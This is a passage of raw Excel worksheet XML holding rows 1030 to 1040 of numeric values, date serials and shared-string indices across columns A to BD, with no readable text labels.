        <v>0</v>
      </c>
      <c r="AY1030">
        <v>8</v>
      </c>
      <c r="AZ1030">
        <v>1</v>
      </c>
      <c r="BA1030" t="s">
        <v>16774</v>
      </c>
      <c r="BB1030" t="s">
        <v>16081</v>
      </c>
      <c r="BC1030" t="s">
        <v>9693</v>
      </c>
      <c r="BD1030" t="s">
        <v>12273</v>
      </c>
    </row>
    <row r="1031" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1031">
        <v>5007</v>
      </c>
      <c r="B1031" t="s">
        <v>7838</v>
      </c>
      <c r="C1031" t="s">
        <v>74</v>
      </c>
      <c r="D1031" t="s">
        <v>7839</v>
      </c>
      <c r="E1031" t="s">
        <v>142</v>
      </c>
      <c r="F1031" t="s">
        <v>3076</v>
      </c>
      <c r="G1031" s="1">
        <v>44316</v>
      </c>
      <c r="H1031">
        <v>6952</v>
      </c>
      <c r="I1031">
        <v>6952</v>
      </c>
      <c r="J1031">
        <v>0</v>
      </c>
      <c r="K1031">
        <v>2</v>
      </c>
      <c r="L1031">
        <v>1</v>
      </c>
      <c r="M1031">
        <v>2</v>
      </c>
      <c r="N1031">
        <v>0</v>
      </c>
      <c r="O1031">
        <v>0</v>
      </c>
      <c r="P1031">
        <v>0</v>
      </c>
      <c r="Q1031">
        <v>3</v>
      </c>
      <c r="R1031">
        <v>1</v>
      </c>
      <c r="S1031">
        <v>0</v>
      </c>
      <c r="T1031">
        <v>2</v>
      </c>
      <c r="U1031">
        <v>0</v>
      </c>
      <c r="V1031">
        <v>200000</v>
      </c>
      <c r="W1031">
        <v>3000</v>
      </c>
      <c r="X1031">
        <v>1320</v>
      </c>
      <c r="Y1031">
        <v>0</v>
      </c>
      <c r="Z1031">
        <v>0</v>
      </c>
      <c r="AA1031">
        <v>0</v>
      </c>
      <c r="AB1031">
        <v>900</v>
      </c>
      <c r="AC1031">
        <v>120000</v>
      </c>
      <c r="AD1031">
        <v>0</v>
      </c>
      <c r="AE1031">
        <v>150000</v>
      </c>
      <c r="AF1031" t="s">
        <v>7840</v>
      </c>
      <c r="AG1031">
        <v>59119</v>
      </c>
      <c r="AH1031">
        <v>14</v>
      </c>
      <c r="AJ1031">
        <v>205</v>
      </c>
      <c r="AK1031" t="s">
        <v>1938</v>
      </c>
      <c r="AL1031" t="s">
        <v>1939</v>
      </c>
      <c r="AM1031" t="s">
        <v>7841</v>
      </c>
      <c r="AN1031" t="s">
        <v>68</v>
      </c>
      <c r="AO1031">
        <v>2019</v>
      </c>
      <c r="AP1031" t="s">
        <v>7842</v>
      </c>
      <c r="AQ1031" t="s">
        <v>7843</v>
      </c>
      <c r="AR1031" t="s">
        <v>7840</v>
      </c>
      <c r="AS1031" t="s">
        <v>71</v>
      </c>
      <c r="AT1031" t="s">
        <v>72</v>
      </c>
      <c r="AU1031">
        <v>26</v>
      </c>
      <c r="AV1031">
        <v>1</v>
      </c>
      <c r="AW1031">
        <v>28</v>
      </c>
      <c r="AX1031">
        <v>38</v>
      </c>
      <c r="AY1031">
        <v>0</v>
      </c>
      <c r="AZ1031">
        <v>1</v>
      </c>
      <c r="BA1031" t="s">
        <v>17535</v>
      </c>
      <c r="BB1031">
        <v>0</v>
      </c>
      <c r="BC1031" t="s">
        <v>12802</v>
      </c>
      <c r="BD1031">
        <v>0</v>
      </c>
    </row>
    <row r="1032" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1032">
        <v>5065</v>
      </c>
      <c r="B1032" t="s">
        <v>7844</v>
      </c>
      <c r="C1032" t="s">
        <v>168</v>
      </c>
      <c r="D1032" t="s">
        <v>7845</v>
      </c>
      <c r="E1032" t="s">
        <v>142</v>
      </c>
      <c r="F1032" t="s">
        <v>143</v>
      </c>
      <c r="G1032" s="1">
        <v>44145</v>
      </c>
      <c r="H1032">
        <v>6982</v>
      </c>
      <c r="I1032">
        <v>6982</v>
      </c>
      <c r="J1032">
        <v>12</v>
      </c>
      <c r="K1032">
        <v>0</v>
      </c>
      <c r="L1032">
        <v>0</v>
      </c>
      <c r="M1032">
        <v>0</v>
      </c>
      <c r="N1032">
        <v>0</v>
      </c>
      <c r="O1032">
        <v>0</v>
      </c>
      <c r="P1032">
        <v>0</v>
      </c>
      <c r="Q1032">
        <v>0</v>
      </c>
      <c r="R1032">
        <v>0</v>
      </c>
      <c r="S1032">
        <v>0</v>
      </c>
      <c r="T1032">
        <v>1</v>
      </c>
      <c r="U1032">
        <v>5450</v>
      </c>
      <c r="V1032">
        <v>0</v>
      </c>
      <c r="W1032">
        <v>0</v>
      </c>
      <c r="X1032">
        <v>0</v>
      </c>
      <c r="Y1032">
        <v>0</v>
      </c>
      <c r="Z1032">
        <v>0</v>
      </c>
      <c r="AA1032">
        <v>0</v>
      </c>
      <c r="AB1032">
        <v>0</v>
      </c>
      <c r="AC1032">
        <v>0</v>
      </c>
      <c r="AD1032">
        <v>0</v>
      </c>
      <c r="AE1032">
        <v>500</v>
      </c>
      <c r="AF1032" t="s">
        <v>7846</v>
      </c>
      <c r="AG1032">
        <v>45113</v>
      </c>
      <c r="AH1032">
        <v>13</v>
      </c>
      <c r="AJ1032">
        <v>182</v>
      </c>
      <c r="AK1032" t="s">
        <v>4250</v>
      </c>
      <c r="AL1032" t="s">
        <v>7847</v>
      </c>
      <c r="AM1032" t="s">
        <v>7848</v>
      </c>
      <c r="AN1032" t="s">
        <v>68</v>
      </c>
      <c r="AO1032">
        <v>2013</v>
      </c>
      <c r="AP1032">
        <v>81222090857</v>
      </c>
      <c r="AQ1032" t="s">
        <v>7849</v>
      </c>
      <c r="AR1032" t="s">
        <v>7846</v>
      </c>
      <c r="AS1032" t="s">
        <v>71</v>
      </c>
      <c r="AT1032" t="s">
        <v>72</v>
      </c>
      <c r="AU1032">
        <v>26</v>
      </c>
      <c r="AV1032">
        <v>1</v>
      </c>
      <c r="AW1032">
        <v>2</v>
      </c>
      <c r="AX1032">
        <v>5</v>
      </c>
      <c r="AY1032">
        <v>0</v>
      </c>
      <c r="AZ1032">
        <v>1</v>
      </c>
      <c r="BA1032" t="s">
        <v>17556</v>
      </c>
      <c r="BB1032">
        <v>0</v>
      </c>
      <c r="BC1032" t="s">
        <v>12330</v>
      </c>
      <c r="BD1032">
        <v>0</v>
      </c>
    </row>
    <row r="1033" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1033">
        <v>5061</v>
      </c>
      <c r="B1033" t="s">
        <v>7850</v>
      </c>
      <c r="C1033" t="s">
        <v>99</v>
      </c>
      <c r="D1033" t="s">
        <v>7851</v>
      </c>
      <c r="E1033" t="s">
        <v>111</v>
      </c>
      <c r="F1033" t="s">
        <v>7852</v>
      </c>
      <c r="G1033" s="1">
        <v>44145</v>
      </c>
      <c r="H1033">
        <v>6997</v>
      </c>
      <c r="I1033">
        <v>6997</v>
      </c>
      <c r="J1033">
        <v>3</v>
      </c>
      <c r="K1033">
        <v>0</v>
      </c>
      <c r="L1033">
        <v>2</v>
      </c>
      <c r="M1033">
        <v>0</v>
      </c>
      <c r="N1033">
        <v>0</v>
      </c>
      <c r="O1033">
        <v>0</v>
      </c>
      <c r="P1033">
        <v>0</v>
      </c>
      <c r="Q1033">
        <v>3</v>
      </c>
      <c r="R1033">
        <v>20</v>
      </c>
      <c r="S1033">
        <v>0</v>
      </c>
      <c r="T1033">
        <v>0</v>
      </c>
      <c r="U1033">
        <v>270000</v>
      </c>
      <c r="V1033">
        <v>0</v>
      </c>
      <c r="W1033">
        <v>9000</v>
      </c>
      <c r="X1033">
        <v>0</v>
      </c>
      <c r="Y1033">
        <v>0</v>
      </c>
      <c r="Z1033">
        <v>0</v>
      </c>
      <c r="AA1033">
        <v>0</v>
      </c>
      <c r="AB1033">
        <v>200</v>
      </c>
      <c r="AC1033">
        <v>50</v>
      </c>
      <c r="AD1033">
        <v>0</v>
      </c>
      <c r="AE1033">
        <v>0</v>
      </c>
      <c r="AF1033" t="s">
        <v>7853</v>
      </c>
      <c r="AG1033">
        <v>14450</v>
      </c>
      <c r="AH1033">
        <v>12</v>
      </c>
      <c r="AJ1033">
        <v>160</v>
      </c>
      <c r="AK1033" t="s">
        <v>114</v>
      </c>
      <c r="AL1033" t="s">
        <v>115</v>
      </c>
      <c r="AM1033" t="s">
        <v>7854</v>
      </c>
      <c r="AN1033" t="s">
        <v>55</v>
      </c>
      <c r="AO1033">
        <v>2016</v>
      </c>
      <c r="AP1033" t="s">
        <v>7855</v>
      </c>
      <c r="AQ1033" t="s">
        <v>7856</v>
      </c>
      <c r="AR1033" t="s">
        <v>7853</v>
      </c>
      <c r="AS1033" t="s">
        <v>71</v>
      </c>
      <c r="AT1033" t="s">
        <v>58</v>
      </c>
      <c r="AU1033">
        <v>0</v>
      </c>
      <c r="AV1033">
        <v>0</v>
      </c>
      <c r="AW1033">
        <v>10</v>
      </c>
      <c r="AX1033">
        <v>7</v>
      </c>
      <c r="AY1033">
        <v>3</v>
      </c>
      <c r="AZ1033">
        <v>0</v>
      </c>
      <c r="BA1033" t="s">
        <v>17560</v>
      </c>
      <c r="BB1033" t="s">
        <v>17563</v>
      </c>
      <c r="BC1033">
        <v>0</v>
      </c>
      <c r="BD1033">
        <v>0</v>
      </c>
    </row>
    <row r="1034" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1034">
        <v>5053</v>
      </c>
      <c r="B1034" t="s">
        <v>7857</v>
      </c>
      <c r="C1034" t="s">
        <v>168</v>
      </c>
      <c r="D1034" t="s">
        <v>7858</v>
      </c>
      <c r="E1034" t="s">
        <v>76</v>
      </c>
      <c r="F1034" t="s">
        <v>7859</v>
      </c>
      <c r="G1034" s="1">
        <v>44253</v>
      </c>
      <c r="H1034">
        <v>7000</v>
      </c>
      <c r="I1034">
        <v>7000</v>
      </c>
      <c r="J1034">
        <v>1</v>
      </c>
      <c r="K1034">
        <v>2</v>
      </c>
      <c r="L1034">
        <v>0</v>
      </c>
      <c r="M1034">
        <v>0</v>
      </c>
      <c r="N1034">
        <v>0</v>
      </c>
      <c r="O1034">
        <v>0</v>
      </c>
      <c r="P1034">
        <v>2</v>
      </c>
      <c r="Q1034">
        <v>2</v>
      </c>
      <c r="R1034">
        <v>2</v>
      </c>
      <c r="S1034">
        <v>0</v>
      </c>
      <c r="T1034">
        <v>1</v>
      </c>
      <c r="U1034">
        <v>600</v>
      </c>
      <c r="V1034">
        <v>0</v>
      </c>
      <c r="W1034">
        <v>0</v>
      </c>
      <c r="X1034">
        <v>0</v>
      </c>
      <c r="Y1034">
        <v>0</v>
      </c>
      <c r="Z1034">
        <v>0</v>
      </c>
      <c r="AA1034">
        <v>50</v>
      </c>
      <c r="AB1034">
        <v>10</v>
      </c>
      <c r="AC1034">
        <v>0</v>
      </c>
      <c r="AD1034">
        <v>0</v>
      </c>
      <c r="AE1034">
        <v>100</v>
      </c>
      <c r="AF1034" t="s">
        <v>7860</v>
      </c>
      <c r="AG1034">
        <v>16411</v>
      </c>
      <c r="AH1034">
        <v>13</v>
      </c>
      <c r="AJ1034">
        <v>184</v>
      </c>
      <c r="AK1034" t="s">
        <v>7861</v>
      </c>
      <c r="AL1034" t="s">
        <v>7862</v>
      </c>
      <c r="AM1034" t="s">
        <v>7863</v>
      </c>
      <c r="AN1034" t="s">
        <v>68</v>
      </c>
      <c r="AO1034">
        <v>2017</v>
      </c>
      <c r="AP1034">
        <v>82110431182</v>
      </c>
      <c r="AQ1034" t="s">
        <v>7864</v>
      </c>
      <c r="AR1034" t="s">
        <v>7860</v>
      </c>
      <c r="AS1034" t="s">
        <v>71</v>
      </c>
      <c r="AT1034" t="s">
        <v>72</v>
      </c>
      <c r="AU1034">
        <v>26</v>
      </c>
      <c r="AV1034">
        <v>1</v>
      </c>
      <c r="AW1034">
        <v>0</v>
      </c>
      <c r="AX1034">
        <v>0</v>
      </c>
      <c r="AY1034">
        <v>6</v>
      </c>
      <c r="AZ1034">
        <v>5</v>
      </c>
      <c r="BA1034" t="s">
        <v>17552</v>
      </c>
      <c r="BB1034">
        <v>0</v>
      </c>
      <c r="BC1034" t="s">
        <v>13276</v>
      </c>
      <c r="BD1034" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="1035" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1035">
        <v>4922</v>
      </c>
      <c r="B1035" t="s">
        <v>7865</v>
      </c>
      <c r="C1035" t="s">
        <v>2308</v>
      </c>
      <c r="D1035" t="s">
        <v>7866</v>
      </c>
      <c r="E1035" t="s">
        <v>843</v>
      </c>
      <c r="F1035" t="s">
        <v>859</v>
      </c>
      <c r="G1035" s="1">
        <v>44126</v>
      </c>
      <c r="H1035">
        <v>7009</v>
      </c>
      <c r="I1035">
        <v>7009</v>
      </c>
      <c r="J1035">
        <v>0</v>
      </c>
      <c r="K1035">
        <v>0</v>
      </c>
      <c r="L1035">
        <v>0</v>
      </c>
      <c r="M1035">
        <v>0</v>
      </c>
      <c r="N1035">
        <v>0</v>
      </c>
      <c r="O1035">
        <v>0</v>
      </c>
      <c r="P1035">
        <v>0</v>
      </c>
      <c r="Q1035">
        <v>2</v>
      </c>
      <c r="R1035">
        <v>5</v>
      </c>
      <c r="S1035">
        <v>0</v>
      </c>
      <c r="T1035">
        <v>1</v>
      </c>
      <c r="U1035">
        <v>0</v>
      </c>
      <c r="V1035">
        <v>0</v>
      </c>
      <c r="W1035">
        <v>0</v>
      </c>
      <c r="X1035">
        <v>0</v>
      </c>
      <c r="Y1035">
        <v>0</v>
      </c>
      <c r="Z1035">
        <v>0</v>
      </c>
      <c r="AA1035">
        <v>0</v>
      </c>
      <c r="AB1035">
        <v>500</v>
      </c>
      <c r="AC1035">
        <v>2500</v>
      </c>
      <c r="AD1035">
        <v>0</v>
      </c>
      <c r="AE1035">
        <v>500</v>
      </c>
      <c r="AF1035" t="s">
        <v>7867</v>
      </c>
      <c r="AG1035">
        <v>98418</v>
      </c>
      <c r="AH1035">
        <v>33</v>
      </c>
      <c r="AJ1035">
        <v>485</v>
      </c>
      <c r="AK1035" t="s">
        <v>7868</v>
      </c>
      <c r="AL1035" t="s">
        <v>7869</v>
      </c>
      <c r="AM1035" t="s">
        <v>7870</v>
      </c>
      <c r="AN1035" t="s">
        <v>68</v>
      </c>
      <c r="AO1035">
        <v>2020</v>
      </c>
      <c r="AP1035">
        <v>82399433694</v>
      </c>
      <c r="AQ1035" t="s">
        <v>7871</v>
      </c>
      <c r="AR1035" t="s">
        <v>7867</v>
      </c>
      <c r="AS1035" t="s">
        <v>71</v>
      </c>
      <c r="AT1035" t="s">
        <v>72</v>
      </c>
      <c r="AU1035">
        <v>20</v>
      </c>
      <c r="AV1035">
        <v>1</v>
      </c>
      <c r="AW1035">
        <v>0</v>
      </c>
      <c r="AX1035">
        <v>0</v>
      </c>
      <c r="AY1035">
        <v>4</v>
      </c>
      <c r="AZ1035">
        <v>1</v>
      </c>
      <c r="BA1035" t="s">
        <v>17492</v>
      </c>
      <c r="BB1035" t="s">
        <v>17496</v>
      </c>
      <c r="BC1035" t="s">
        <v>12335</v>
      </c>
      <c r="BD1035" t="s">
        <v>10191</v>
      </c>
    </row>
    <row r="1036" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1036">
        <v>2791</v>
      </c>
      <c r="B1036" t="s">
        <v>7872</v>
      </c>
      <c r="C1036" t="s">
        <v>74</v>
      </c>
      <c r="D1036" t="s">
        <v>7873</v>
      </c>
      <c r="E1036" t="s">
        <v>49</v>
      </c>
      <c r="F1036" t="s">
        <v>7874</v>
      </c>
      <c r="G1036" s="1">
        <v>44208</v>
      </c>
      <c r="H1036">
        <v>7046</v>
      </c>
      <c r="I1036">
        <v>7046</v>
      </c>
      <c r="J1036">
        <v>0</v>
      </c>
      <c r="K1036">
        <v>0</v>
      </c>
      <c r="L1036">
        <v>0</v>
      </c>
      <c r="M1036">
        <v>0</v>
      </c>
      <c r="N1036">
        <v>0</v>
      </c>
      <c r="O1036">
        <v>0</v>
      </c>
      <c r="P1036">
        <v>0</v>
      </c>
      <c r="Q1036">
        <v>2</v>
      </c>
      <c r="R1036">
        <v>1</v>
      </c>
      <c r="S1036">
        <v>0</v>
      </c>
      <c r="T1036">
        <v>1</v>
      </c>
      <c r="U1036">
        <v>0</v>
      </c>
      <c r="V1036">
        <v>0</v>
      </c>
      <c r="W1036">
        <v>0</v>
      </c>
      <c r="X1036">
        <v>0</v>
      </c>
      <c r="Y1036">
        <v>0</v>
      </c>
      <c r="Z1036">
        <v>0</v>
      </c>
      <c r="AA1036">
        <v>0</v>
      </c>
      <c r="AB1036">
        <v>30</v>
      </c>
      <c r="AC1036">
        <v>150</v>
      </c>
      <c r="AD1036">
        <v>0</v>
      </c>
      <c r="AE1036">
        <v>50</v>
      </c>
      <c r="AF1036" t="s">
        <v>7875</v>
      </c>
      <c r="AG1036">
        <v>53362</v>
      </c>
      <c r="AH1036">
        <v>14</v>
      </c>
      <c r="AJ1036">
        <v>190</v>
      </c>
      <c r="AK1036" t="s">
        <v>637</v>
      </c>
      <c r="AL1036" t="s">
        <v>7876</v>
      </c>
      <c r="AM1036" t="s">
        <v>7877</v>
      </c>
      <c r="AN1036" t="s">
        <v>68</v>
      </c>
      <c r="AO1036">
        <v>2011</v>
      </c>
      <c r="AP1036">
        <v>811288337</v>
      </c>
      <c r="AQ1036" t="s">
        <v>7878</v>
      </c>
      <c r="AR1036" t="s">
        <v>7875</v>
      </c>
      <c r="AS1036" t="s">
        <v>71</v>
      </c>
      <c r="AT1036" t="s">
        <v>72</v>
      </c>
      <c r="AU1036">
        <v>20</v>
      </c>
      <c r="AV1036">
        <v>1</v>
      </c>
      <c r="AW1036">
        <v>1</v>
      </c>
      <c r="AX1036">
        <v>4</v>
      </c>
      <c r="AY1036">
        <v>0</v>
      </c>
      <c r="AZ1036">
        <v>0</v>
      </c>
      <c r="BA1036" t="s">
        <v>17330</v>
      </c>
      <c r="BB1036" t="s">
        <v>16083</v>
      </c>
      <c r="BC1036" t="s">
        <v>12369</v>
      </c>
      <c r="BD1036">
        <v>0</v>
      </c>
    </row>
    <row r="1037" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1037">
        <v>5074</v>
      </c>
      <c r="B1037" t="s">
        <v>7879</v>
      </c>
      <c r="C1037" t="s">
        <v>3717</v>
      </c>
      <c r="D1037" t="s">
        <v>7880</v>
      </c>
      <c r="E1037" t="s">
        <v>76</v>
      </c>
      <c r="F1037" t="s">
        <v>7881</v>
      </c>
      <c r="G1037" s="1">
        <v>44159</v>
      </c>
      <c r="H1037">
        <v>7057</v>
      </c>
      <c r="I1037">
        <v>7057</v>
      </c>
      <c r="J1037">
        <v>10</v>
      </c>
      <c r="K1037">
        <v>0</v>
      </c>
      <c r="L1037">
        <v>0</v>
      </c>
      <c r="M1037">
        <v>0</v>
      </c>
      <c r="N1037">
        <v>0</v>
      </c>
      <c r="O1037">
        <v>0</v>
      </c>
      <c r="P1037">
        <v>0</v>
      </c>
      <c r="Q1037">
        <v>1</v>
      </c>
      <c r="R1037">
        <v>1</v>
      </c>
      <c r="S1037">
        <v>0</v>
      </c>
      <c r="T1037">
        <v>0</v>
      </c>
      <c r="U1037">
        <v>1000</v>
      </c>
      <c r="V1037">
        <v>0</v>
      </c>
      <c r="W1037">
        <v>0</v>
      </c>
      <c r="X1037">
        <v>0</v>
      </c>
      <c r="Y1037">
        <v>0</v>
      </c>
      <c r="Z1037">
        <v>0</v>
      </c>
      <c r="AA1037">
        <v>0</v>
      </c>
      <c r="AB1037">
        <v>100</v>
      </c>
      <c r="AC1037">
        <v>100</v>
      </c>
      <c r="AD1037">
        <v>0</v>
      </c>
      <c r="AE1037">
        <v>0</v>
      </c>
      <c r="AF1037" t="s">
        <v>7882</v>
      </c>
      <c r="AG1037">
        <v>38215</v>
      </c>
      <c r="AH1037">
        <v>8</v>
      </c>
      <c r="AJ1037">
        <v>125</v>
      </c>
      <c r="AK1037" t="s">
        <v>3721</v>
      </c>
      <c r="AL1037" t="s">
        <v>3722</v>
      </c>
      <c r="AM1037" t="s">
        <v>7883</v>
      </c>
      <c r="AN1037" t="s">
        <v>68</v>
      </c>
      <c r="AO1037">
        <v>2018</v>
      </c>
      <c r="AP1037">
        <v>82179414481</v>
      </c>
      <c r="AQ1037" t="s">
        <v>7884</v>
      </c>
      <c r="AR1037" t="s">
        <v>7882</v>
      </c>
      <c r="AS1037" t="s">
        <v>71</v>
      </c>
      <c r="AT1037" t="s">
        <v>72</v>
      </c>
      <c r="AU1037">
        <v>6</v>
      </c>
      <c r="AV1037">
        <v>1</v>
      </c>
      <c r="AW1037">
        <v>0</v>
      </c>
      <c r="AX1037">
        <v>20</v>
      </c>
      <c r="AY1037">
        <v>0</v>
      </c>
      <c r="AZ1037">
        <v>10</v>
      </c>
      <c r="BA1037" t="s">
        <v>17566</v>
      </c>
      <c r="BB1037" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1037" t="s">
        <v>12355</v>
      </c>
      <c r="BD1037">
        <v>0</v>
      </c>
    </row>
    <row r="1038" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1038">
        <v>2795</v>
      </c>
      <c r="B1038" t="s">
        <v>7885</v>
      </c>
      <c r="C1038" t="s">
        <v>157</v>
      </c>
      <c r="D1038" t="s">
        <v>7886</v>
      </c>
      <c r="E1038" t="s">
        <v>6634</v>
      </c>
      <c r="F1038" t="s">
        <v>6635</v>
      </c>
      <c r="G1038" s="1">
        <v>44223</v>
      </c>
      <c r="H1038">
        <v>7065</v>
      </c>
      <c r="I1038">
        <v>7065</v>
      </c>
      <c r="J1038">
        <v>0</v>
      </c>
      <c r="K1038">
        <v>0</v>
      </c>
      <c r="L1038">
        <v>0</v>
      </c>
      <c r="M1038">
        <v>0</v>
      </c>
      <c r="N1038">
        <v>0</v>
      </c>
      <c r="O1038">
        <v>0</v>
      </c>
      <c r="P1038">
        <v>0</v>
      </c>
      <c r="Q1038">
        <v>0</v>
      </c>
      <c r="R1038">
        <v>0</v>
      </c>
      <c r="S1038">
        <v>0</v>
      </c>
      <c r="T1038">
        <v>2</v>
      </c>
      <c r="U1038">
        <v>0</v>
      </c>
      <c r="V1038">
        <v>0</v>
      </c>
      <c r="W1038">
        <v>0</v>
      </c>
      <c r="X1038">
        <v>0</v>
      </c>
      <c r="Y1038">
        <v>0</v>
      </c>
      <c r="Z1038">
        <v>0</v>
      </c>
      <c r="AA1038">
        <v>0</v>
      </c>
      <c r="AB1038">
        <v>0</v>
      </c>
      <c r="AC1038">
        <v>0</v>
      </c>
      <c r="AD1038">
        <v>0</v>
      </c>
      <c r="AE1038">
        <v>204000</v>
      </c>
      <c r="AF1038" t="s">
        <v>7887</v>
      </c>
      <c r="AG1038">
        <v>61257</v>
      </c>
      <c r="AH1038">
        <v>16</v>
      </c>
      <c r="AJ1038">
        <v>242</v>
      </c>
      <c r="AK1038" t="s">
        <v>1164</v>
      </c>
      <c r="AL1038" t="s">
        <v>7888</v>
      </c>
      <c r="AM1038" t="s">
        <v>7889</v>
      </c>
      <c r="AN1038" t="s">
        <v>55</v>
      </c>
      <c r="AO1038">
        <v>1985</v>
      </c>
      <c r="AP1038">
        <v>317881964</v>
      </c>
      <c r="AQ1038" t="s">
        <v>7890</v>
      </c>
      <c r="AR1038" t="s">
        <v>7890</v>
      </c>
      <c r="AS1038" t="s">
        <v>71</v>
      </c>
      <c r="AT1038" t="s">
        <v>58</v>
      </c>
      <c r="AU1038">
        <v>26</v>
      </c>
      <c r="AV1038">
        <v>1</v>
      </c>
      <c r="AW1038">
        <v>19</v>
      </c>
      <c r="AX1038">
        <v>9</v>
      </c>
      <c r="AY1038">
        <v>14</v>
      </c>
      <c r="AZ1038">
        <v>164</v>
      </c>
      <c r="BA1038" t="s">
        <v>17336</v>
      </c>
      <c r="BB1038">
        <v>0</v>
      </c>
      <c r="BC1038" t="s">
        <v>9698</v>
      </c>
      <c r="BD1038">
        <v>0</v>
      </c>
    </row>
    <row r="1039" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1039">
        <v>4960</v>
      </c>
      <c r="B1039" t="s">
        <v>7891</v>
      </c>
      <c r="C1039" t="s">
        <v>2848</v>
      </c>
      <c r="D1039" t="s">
        <v>7892</v>
      </c>
      <c r="E1039" t="s">
        <v>142</v>
      </c>
      <c r="F1039" t="s">
        <v>666</v>
      </c>
      <c r="G1039" s="1">
        <v>44155</v>
      </c>
      <c r="H1039">
        <v>7070</v>
      </c>
      <c r="I1039">
        <v>7070</v>
      </c>
      <c r="J1039">
        <v>1</v>
      </c>
      <c r="K1039">
        <v>0</v>
      </c>
      <c r="L1039">
        <v>0</v>
      </c>
      <c r="M1039">
        <v>0</v>
      </c>
      <c r="N1039">
        <v>0</v>
      </c>
      <c r="O1039">
        <v>0</v>
      </c>
      <c r="P1039">
        <v>0</v>
      </c>
      <c r="Q1039">
        <v>0</v>
      </c>
      <c r="R1039">
        <v>0</v>
      </c>
      <c r="S1039">
        <v>1</v>
      </c>
      <c r="T1039">
        <v>0</v>
      </c>
      <c r="U1039">
        <v>250</v>
      </c>
      <c r="V1039">
        <v>0</v>
      </c>
      <c r="W1039">
        <v>0</v>
      </c>
      <c r="X1039">
        <v>0</v>
      </c>
      <c r="Y1039">
        <v>0</v>
      </c>
      <c r="Z1039">
        <v>0</v>
      </c>
      <c r="AA1039">
        <v>0</v>
      </c>
      <c r="AB1039">
        <v>0</v>
      </c>
      <c r="AC1039">
        <v>0</v>
      </c>
      <c r="AD1039">
        <v>1</v>
      </c>
      <c r="AE1039">
        <v>0</v>
      </c>
      <c r="AF1039" t="s">
        <v>7893</v>
      </c>
      <c r="AG1039">
        <v>30252</v>
      </c>
      <c r="AH1039">
        <v>9</v>
      </c>
      <c r="AJ1039">
        <v>112</v>
      </c>
      <c r="AK1039" t="s">
        <v>7894</v>
      </c>
      <c r="AL1039" t="s">
        <v>7895</v>
      </c>
      <c r="AM1039" t="s">
        <v>7896</v>
      </c>
      <c r="AN1039" t="s">
        <v>68</v>
      </c>
      <c r="AO1039">
        <v>2009</v>
      </c>
      <c r="AP1039" t="s">
        <v>7897</v>
      </c>
      <c r="AQ1039">
        <v>82282090905</v>
      </c>
      <c r="AR1039" t="s">
        <v>7898</v>
      </c>
      <c r="AS1039" t="s">
        <v>71</v>
      </c>
      <c r="AT1039" t="s">
        <v>72</v>
      </c>
      <c r="AU1039">
        <v>0</v>
      </c>
      <c r="AV1039">
        <v>0</v>
      </c>
      <c r="AW1039">
        <v>6</v>
      </c>
      <c r="AX1039">
        <v>0</v>
      </c>
      <c r="AY1039">
        <v>5</v>
      </c>
      <c r="AZ1039">
        <v>2</v>
      </c>
      <c r="BA1039" t="s">
        <v>17514</v>
      </c>
      <c r="BB1039">
        <v>0</v>
      </c>
      <c r="BC1039" t="s">
        <v>10448</v>
      </c>
      <c r="BD1039">
        <v>0</v>
      </c>
    </row>
    <row r="1040" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1040">
        <v>5073</v>
      </c>
      <c r="B1040" t="s">
        <v>7899</v>
      </c>
      <c r="C1040" t="s">
        <v>47</v>
      </c>
      <c r="D1040" t="s">
        <v>7900</v>
      </c>
      <c r="E1040" t="s">
        <v>142</v>
      </c>
      <c r="F1040" t="s">
        <v>7901</v>
      </c>
      <c r="G1040" s="1">
        <v>44139</v>
      </c>
      <c r="H1040">
        <v>7083</v>
      </c>
      <c r="I1040">
        <v>7083</v>
      </c>
      <c r="J1040">
        <v>3</v>
      </c>
      <c r="K1040">
        <v>1</v>
      </c>
      <c r="L1040">
        <v>6</v>
      </c>
      <c r="M1040">
        <v>4</v>
      </c>
      <c r="N1040">
        <v>2400</v>
      </c>
      <c r="O1040">
        <v>0</v>
      </c>
      <c r="P1040">
        <v>4</v>
      </c>
      <c r="Q1040">
        <v>2</v>
      </c>
      <c r="R1040">
        <v>5</v>
      </c>
      <c r="S1040">
        <v>0</v>
      </c>
      <c r="T1040">
        <v>0</v>
      </c>
      <c r="U1040">
        <v>300</v>
      </c>
      <c r="V1040">
        <v>300</v>
      </c>
      <c r="W1040">
        <v>2000</v>
      </c>
      <c r="X1040">
        <v>1200</v>
      </c>
      <c r="Y1040">
        <v>0</v>
      </c>
      <c r="Z1040">
        <v>0</v>
      </c>
      <c r="AA1040">
        <v>1200</v>
      </c>
      <c r="AB1040">
        <v>100</v>
      </c>
      <c r="AC1040">
        <v>100</v>
      </c>
      <c r="AD1040">
        <v>0</v>
      </c>
      <c r="AE1040">
        <v>0</v>
      </c>
      <c r="AF1040" t="s">
        <v>7902</v>
      </c>
      <c r="AG1040">
        <v>20239</v>
      </c>
      <c r="AH1040">
        <v>2</v>
      </c>
      <c r="AJ1040">
        <v>53</v>
      </c>
      <c r="AK1040" t="s">
        <v>3275</v>
      </c>
      <c r="AL1040" t="s">
        <v>7903</v>
      </c>
      <c r="AM1040" t="s">
        <v>7904</v>
      </c>
      <c r="AN1040" t="s">
        <v>68</v>
      </c>
      <c r="AO1040">
        <v>2020</v>
      </c>
      <c r="AP1040">
        <v>82166226888</v>
      </c>
      <c r="AQ1040" t="s">
        <v>7905</v>
      </c>
      <c r="AR1040" t="s">
        <v>7906</v>
      </c>
      <c r="AU1040">
        <v>24</v>
      </c>
      <c r="AV1040">
        <v>1</v>
      </c>
      <c r="AW1040">
        <v>0</v>
      </c>
      <c r="AX1040">
        <v>0</v>
      </c>
      <c r="AY1040">
        <v>1</v>
      </c>
      <c r="AZ1040">
        <v>1</v>
      </c>
      <c r="BA1040" t="s">
        <v>17521</v>
      </c>
      <c r="BB1040" t="s">
        <v>16067</v>
      </c>
      <c r="BC1040">
        <v>0</v>
      </c>
      <c r="BD1040" t="s">
        <v>10285</v>
      </c>
    </row>
    <row r="1041" spans="1:56" x14ac:dyDescent="0.2">
